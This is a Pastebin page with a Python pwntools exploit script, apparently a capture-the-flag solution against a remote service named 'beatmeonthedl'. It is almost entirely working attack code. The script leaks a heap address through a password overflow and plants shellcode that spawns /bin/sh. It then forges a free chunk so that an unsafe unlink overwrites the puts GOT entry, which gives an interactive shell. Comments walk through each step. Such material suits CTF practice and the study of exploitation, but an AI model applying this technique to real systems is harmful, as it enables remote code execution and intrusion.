Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- from pwn import *
- context(os="linux", arch="amd64")
- #p = process("./beatmeonthedl")
- p = remote("sploitbox.com", 10001)
- # Make a menu choice
- def menu(choice):
- p.recvuntil("| ")
- p.sendline(str(choice))
- # Add a request
- def request(data):
- menu(1)
- p.recvuntil('Request text > ')
- p.send(data)
- # Print requests
- def _print():
- menu(2)
- # Delete a request
- def delete(req):
- menu(3)
- p.recvuntil('choice: ')
- p.sendline(str(req))
- # Change a request
- def change(req, data):
- menu(4)
- p.recvuntil('choice: ')
- p.sendline(str(req))
- p.recvuntil('data: ')
- p.send(data)
- # Exit
- def exit():
- menu(5)
- # Credentials are written in plain text in the binary
- username = "mcfly"
- password = "awesnap"
- # The general idea for this solution is to write an entry in the GOT that points
- # to our shellcode so that the program ends up jumping on it.
- # We can exploit the overflow on the password input to leak a pointer to the
- # heap, which we will need to be able to jump to our shellcode. To achieve this
- # we need to write a password with a length of 24 bytes.
- fakepass = "A" * 24
- p.recvuntil("Enter username: ")
- p.sendline(username)
- p.recv()
- # Send the wrong password once to leak the pointer to the heap.
- p.send(fakepass)
- output = p.recvuntil("Enter username: ")
- # Find our fake password in the output
- heap_start = output[output.index(fakepass):]
- # Drop the first 24 bytes, which is our fake password.
- heap_start = heap_start[24:]
- # We expect our pointer to be about 5 bytes long
- heap_start = heap_start[:5]
- # We need to interpret the data we receive correctly to get the right address.
- # The 4th byte of the pointer might be a null byte (in which case only the 4th
- # character will be a newline). It might also be a newline (in which case the
- # 5th character will also be a newline).
- if heap_start[3] == "\n" and heap_start[4] != "\n":
- heap_start = heap_start[:3] + "\x00" * 5
- else:
- heap_start = heap_start[:4] + "\x00" * 4
- # The heap always starts at 0xXXXXXX00, and the first two chunks are used for
- # the passwords that we sent. The text for the first request actually starts
- # at 0xXXXXXX50, so we change the first byte to 0x50.
- shellcode_start = "\x50" + heap_start[1:]
- # Login correctly this time.
- p.sendline(username)
- p.recv()
- p.send(password)
- # By writing a request properly, we can get
- # `*(a + 0x18) = b` and `*(b + 0x10) = a`
- # where a and b are two addresses that we control (fd and bk).
- # We create all requests first and then set up the exploit.
- request("you")
- request("just")
- request("got")
- request("pwned")
- # We will put our shellcode in the first request
- # Part of the shellcode will be overwritten, we need to start the shellcode with
- # a jump to get around that.
- # This is the assembly to jump 0x13 bytes forward.
- shellcode = "\xe9\x13\x00\x00\x00"
- # Filler
- shellcode += "\x90" * 0x13
- # Assembly to execute /bin/sh
- shellcode += asm(shellcraft.sh())
- change(0, shellcode)
- print("Wrote shellcode")
- # We want to replace the entry for puts with the address of our shellcode.
- # The address of the entry for puts is this:
- puts_reloc_address = 0x609958
- # We need to subtract 0x18 as per the equation.
- fd = pack(puts_reloc_address - 0x18)
- # We want to write the address of our shellcode in the entry for puts.
- bk = shellcode_start
- # Update request #3 to make it look like a free chunk. We also overflow
- # on request #4 to change it's prev_inuse bit to 0 (size 0x42) to make it think
- # that request #3 is free.
- evil_request = fd + bk + "\x00" * 0x20 + pack(0x40) + pack(0x42)
- change(2, evil_request)
- print("Wrote evil request")
- # Deleting request #4 will trigger a call to consolidate requests #3 and #4,
- # which will change the entry for puts with the address of our shellcode.
- delete(3)
- # Puts (and therefore our shellcode) is called immediately after we're done
- # deleting a request, so at this point we have a shell.
- print("Popping shell :)")
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement